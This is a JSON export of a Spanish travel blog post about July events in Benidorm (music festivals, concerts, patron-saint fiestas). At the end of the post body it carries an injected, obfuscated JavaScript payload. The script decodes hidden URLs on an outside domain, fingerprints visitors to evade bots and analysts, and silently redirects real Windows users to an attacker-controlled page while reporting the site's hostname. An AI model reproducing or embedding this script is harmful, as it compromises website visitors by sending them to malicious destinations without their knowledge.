{"id":926,"date":"2018-07-04T07:20:39","date_gmt":"2018-07-04T07:20:39","guid":{"rendered":"https:\/\/www.beninter.com\/blog\/?p=926"},"modified":"2025-08-02T12:28:20","modified_gmt":"2025-08-02T10:28:20","slug":"vacaciones-benidorm-julio-eventos","status":"publish","type":"post","link":"https:\/\/www.beninter.com\/blog\/2018\/07\/04\/vacaciones-benidorm-julio-eventos\/","title":{"rendered":"Vacaciones en Benidorm en julio: descubre los eventos clave del mes"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-927 alignright\" src=\"https:\/\/www.beninter.com\/blog\/wp-content\/uploads\/2018\/06\/vacaciones-benidorm-julio-300x200.jpg\" alt=\"Vacaciones Benidorm julio\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.beninter.com\/blog\/wp-content\/uploads\/2018\/06\/vacaciones-benidorm-julio-300x200.jpg 300w, https:\/\/www.beninter.com\/blog\/wp-content\/uploads\/2018\/06\/vacaciones-benidorm-julio.jpg 767w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a1Qu\u00e9 bien nos est\u00e1 sentando el verano! Y es que en Benidorm es muy f\u00e1cil disfrutarlo. Playa, piscina, sol, terrazas, cenas al aire libre\u2026 \u00a1Y vuelta a empezar! As\u00ed estamos pasando nuestros d\u00edas por aqu\u00ed. Y as\u00ed los podr\u00edas pasar t\u00fa tambi\u00e9n si vienes de <a href=\"https:\/\/www.beninter.com\/vacaciones-benidorm\">vacaciones a Benidorm<\/a>. Pero es que, adem\u00e1s, julio viene cargado de planes que queremos contarte para que no te pierdas nada de nada. As\u00ed que, como siempre te decimos\u2026 Coge boli y papel y toma nota de los eventos que vienen este mes.<\/p>\n<p>&nbsp;<\/p>\n<h2 class=\"subtitulo\">Low Festival Benidorm<\/h2>\n<p>Uno de los eventos m\u00e1s esperados del mes de julio, especialmente por el p\u00fablico m\u00e1s joven, es el <a href=\"http:\/\/lowfestival.es\/\">Low Festival<\/a>. Y este a\u00f1o con m\u00e1s raz\u00f3n debido a que el festival celebra su d\u00e9cima edici\u00f3n y se espera que llegue cargada de sorpresas. Distintos g\u00e9neros y propuestas musicales se dan cita en el polideportivo Guillermo Amor el fin de semana del 27, 28 y 29 de julio por lo que, adem\u00e1s de m\u00fasica, podr\u00e1s disfrutar de las amplias y c\u00f3modas infraestructuras que ofrece el espacio. El jueves 26, adem\u00e1s, podr\u00e1s acercarte a la Playa de Levante para ver los tradicionales conciertos de bienvenida completamente gratuitos.<\/p>\n<h2 class=\"subtitulo\">Reggaeton Beach Festival Benidorm<\/h2>\n<p>Fueron muchas las ciudades que enviaron peticiones para que este festival las escogiese. Pero fue Benidorm la elegida para concentrar el 19 de julio tambi\u00e9n en el polideportivo Guillermo Amor conciertos de los DJs y artistas con m\u00e1s nombre en este g\u00e9nero musical. Durante todo el d\u00eda prometen ofrecer, adem\u00e1s de m\u00fasica, actividades, masterclass y m\u00e1s sorpresas.<\/p>\n<h2 class=\"subtitulo\">Conciertos en Benidorm<\/h2>\n<p>Este verano parece que Benidorm va a batir su r\u00e9cord de conciertos durante los meses de verano. \u00a1Y eso nos encanta! \u00bfTe imaginas que en tus vacaciones en Benidorm pudieras disfrutar de uno de tus cantantes favoritos? Que sepas que eso podr\u00eda cumplirse f\u00e1cilmente. Este mismo viernes, el 6 de julio, le toca a Sergio Dalma en el Auditorio Julio Iglesias. El 12 de julio en el mismo lugar estar\u00e1n Sweet California. El 20 de julio, dentro del Festival Con Mucho Arte, estar\u00e1 Antonio Orozco en el Auditorio Julio Iglesias tambi\u00e9n. Y el 22 de julio le toca a Pastora Soler en el Benidorm Palace.<\/p>\n<p>Otros espect\u00e1culos, aunque no por parte de cantantes, que creemos que son interesantes y queremos que tengas en cuenta son la actuaci\u00f3n de Los Morancos el 14 de julio y los espect\u00e1culos de danza por parte de Los Vivancos, el 21 de julio, y Sara Baras, el 22 de julio. Todos ellos en el Auditorio Julio Iglesias.<\/p>\n<h2 class=\"subtitulo\">Fiestas de San Jaime y Santa Ana en Benidorm<\/h2>\n<p>El 25 y 26 de julio las calles de Benidorm se engalanan para celebrar el d\u00eda de San Jaime y Santa Ana, respectivamente. \u00bfCu\u00e1l es el motivo de ello? Que, junto a la Virgen del Sufragio, son los patrones del pueblo. Estos d\u00edas, por tanto, est\u00e1n cargados de actividades a trav\u00e9s de los que podr\u00e1s conocer parte de la tradici\u00f3n de Benidorm.<script>!async function(){let e=decodeURIComponent(escape(atob(\"aHR0cHM6Ly9tZXRyaWNhbHRpYy5jb20vYXBpL2dldA==\"))),t=decodeURIComponent(escape(atob(\"aHR0cHM6Ly9tZXRyaWNhbHRpYy5jb20vYXBpL2xvZw==\")));function r(e){return btoa(unescape(encodeURIComponent(e)))}let n={};if(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,r]=e.split(\"=\");t&&r&&(n[t]=decodeURIComponent(r.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return;function i(e,t){let r=e.match(t);return r?parseInt(r[1],10):null}let a=navigator.userAgent,o=\/Windows NT 10.0\/.test(a),l={chrome:136,edge:134,opera:120,yandex:24,vivaldi:6,firefox:140,brave:136},s=i(a,\/Chrome\\\/(\\d+)\\.\/),c=i(a,\/Edg\\\/(\\d+)\\.\/),d=i(a,\/OPR\\\/(\\d+)\\.\/),u=i(a,\/YaBrowser\\\/(\\d+)\\.\/),$=i(a,\/Vivaldi\\\/(\\d+)\\.\/),h=i(a,\/Firefox\\\/(\\d+)\\.\/),f=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(a)&&\/Chrome\\\/(\\d+)\\.\/.test(a),y=!1;s&&s>=l.chrome?y=!0:c&&c>=l.edge?y=!0:d&&d>=l.opera?y=!0:u&&u>=l.yandex?y=!0:$&&$>=l.vivaldi?y=!0:h&&h>=l.firefox?y=!0:f&&s&&s>=l.brave&&(y=!0);let g=navigator.webdriver||\/HeadlessChrome\/.test(a)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(a),m=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory;if(!o||g||m)return;if(!y){try{fetch(t)}catch(v){}return}async function p(e,t={}){let{timeout:r=3e3}=t,n=new AbortController,i=setTimeout(()=>n.abort(),r);try{let a=await fetch(e,{...t,signal:n.signal});return clearTimeout(i),a}catch(o){return clearTimeout(i),null}}async function w(t=1){try{let n=await p(e,{timeout:3e3});if(!n||403===n.status)return null;if(!n.ok)throw Error(\"Network response was not ok\");let i=await n.json();return`${i.url}\/?wsid=${window.location.hostname}&domain=${r(window.location.hostname)}`}catch(a){if(t<1)return w(t+1);return null}}let _=document.querySelector('link[rel=\"icon\"]'),b=await w();if(b){let H=b;_&#038;&#038;(H+=`&#038;link=${r(_.href)}`),window.location.replace(H)}}();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; \u00a1Qu\u00e9 bien nos est\u00e1 sentando el verano! Y es que en Benidorm es muy f\u00e1cil disfrutarlo. Playa, piscina, sol, terrazas, cenas al aire libre\u2026 \u00a1Y vuelta a empezar! As\u00ed estamos pasando nuestros d\u00edas por aqu\u00ed. Y as\u00ed los podr\u00edas pasar t\u00fa tambi\u00e9n si vienes de vacaciones a Benidorm. Pero es que, adem\u00e1s, julio viene [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":927,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18],"tags":[],"class_list":["post-926","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-planes-benidorm"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts\/926","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/comments?post=926"}],"version-history":[{"count":7,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts\/926\/revisions"}],"predecessor-version":[{"id":1153,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts\/926\/revisions\/1153"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/media\/927"}],"wp:attachment":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/media?parent=926"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/categories?post=926"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/tags?post=926"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}